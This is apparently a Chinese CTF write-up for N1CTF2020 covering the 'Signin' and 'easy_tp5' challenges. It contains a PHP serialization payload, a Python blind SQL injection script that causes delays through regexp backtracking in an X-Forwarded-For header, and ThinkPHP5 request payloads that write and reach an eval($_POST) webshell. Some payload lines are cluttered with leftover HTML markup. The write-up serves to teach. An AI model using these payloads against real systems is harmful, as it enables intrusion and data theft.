N1CTF2020

/ 0评 / 0

Signin

 <?php
 
 class flag {
     public $ip;
     public $check;
 }
 
 class ip {
     public $ip;
 }
 
 $ip = new ip();
 $flag = new flag();
 $flag->ip = $ip;
 echo urlencode(serialize($flag));
 
 ?>

之后是注入,用笛卡尔积可以延时,但是很不稳定,还会把机器跑崩溃

 import requests
 import time
 url='http://101.32.205.189/?input=O:4:"flag":2:{s:2:"ip";O:2:"ip":1:{s:2:"ip";N;}s:5:"check";N;}'
 x=""
 for i in range(1,100):
     max = 130
     min = 30
     while max >=min:
         mid=(max+min)//2
         header = {"X-Forwarded-For": "'+if((ascii(substr((select key from n1key)," + str(i) + ",1))>" + str(mid) + "),(select concat(lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a'),lpad(1,999999,'a')) regexp '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b'),1),'123')#"}
         t1 = time.time()
         try:
             r=requests.get(url=url,headers=header,timeout=3)
             max = mid
             if max == mid == min:
                 x += chr(mid)
                 print(str(i) + ':' + x)
                 break
         except:
             t2=time.time()
             if((t2-t1)>3):
                 min = mid + 1
             else:
                 max=mid
             if max == mid == min:
                 x += chr(mid)
                 print(str(i) + ':' + x)
                 break
                 
 

跑炸了几次靶机以后问出题人是ipad写成1pad了,,直接给了flag

easy_tp5

POST[]=-1&method=POST&filter[]=phpinfo&_method=__construct

可以查看phpinfo 发现disable_functions和open_basedir

使用数组发现无法写shell后,审计源码

 可以调用创建模板

 _method</span><span class="cm-operator">=</span><span class="cm-variable">__construct</span><span class="cm-operator">&</span><span class="cm-variable">method</span><span class="cm-operator">=</span><span class="cm-variable">GET</span><span class="cm-operator">&</span><span class="cm-variable">filter</span>[]<span class="cm-operator">=</span><span class="cm-variable">think\Build</span>::<span class="cm-variable">module</span><span class="cm-operator">&</span><span class="cm-variable">server</span>[]<span class="cm-operator">=</span><span class="cm-number">1</span><span class="cm-operator">&</span><span class="cm-variable">get</span>[]<span class="cm-operator">=</span>..<span class="cm-operator">/</span><span class="cm-keyword">public</span><span class="cm-operator">/</span><span class="cm-variable">aaa

本地测试通过 linux系统下测试可以写入如下的文件(Windows因为文件夹名称限制不成功)

 _method</span><span class="cm-operator">=</span><span class="cm-variable">__construct</span><span class="cm-operator">&</span><span class="cm-variable">method</span><span class="cm-operator">=</span><span class="cm-variable">GET</span><span class="cm-operator">&</span><span class="cm-variable">filter</span>[]<span class="cm-operator">=</span><span class="cm-variable">think\Build</span>::<span class="cm-variable">module</span><span class="cm-operator">&</span><span class="cm-variable">server</span>[]<span class="cm-operator">=</span><span class="cm-number">1</span><span class="cm-operator">&</span><span class="cm-variable">get</span>[]<span class="cm-operator">=</span>..<span class="cm-operator">/</span><span class="cm-keyword">public</span><span class="cm-operator">/</span><span class="cm-variable">aaa</span><span class="cm-operator">?<?</span><span class="cm-variable">php</span> <span class="cm-builtin">phpinfo</span>();<span class="cm-operator">?></span><span class="cm-variable">     

直接访问报错。发现

 _method=__construct&method=POST&POST=index//../../public/a?><?php eval($_POST['a']);?>&filter[]=think\Build::module

可以用 // 注释就不会报错了,

访问http://101.32.184.39/a%3F%3E%3C%3Fphp%20eval%28%24_POST%5B%27a%27%5D%29%3B%3F%3E/controller/Index.php

成功GETSHELL 使用蚁剑+bypass脚本一把梭

tac /flag

 

Docker_manager

等待补充



发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注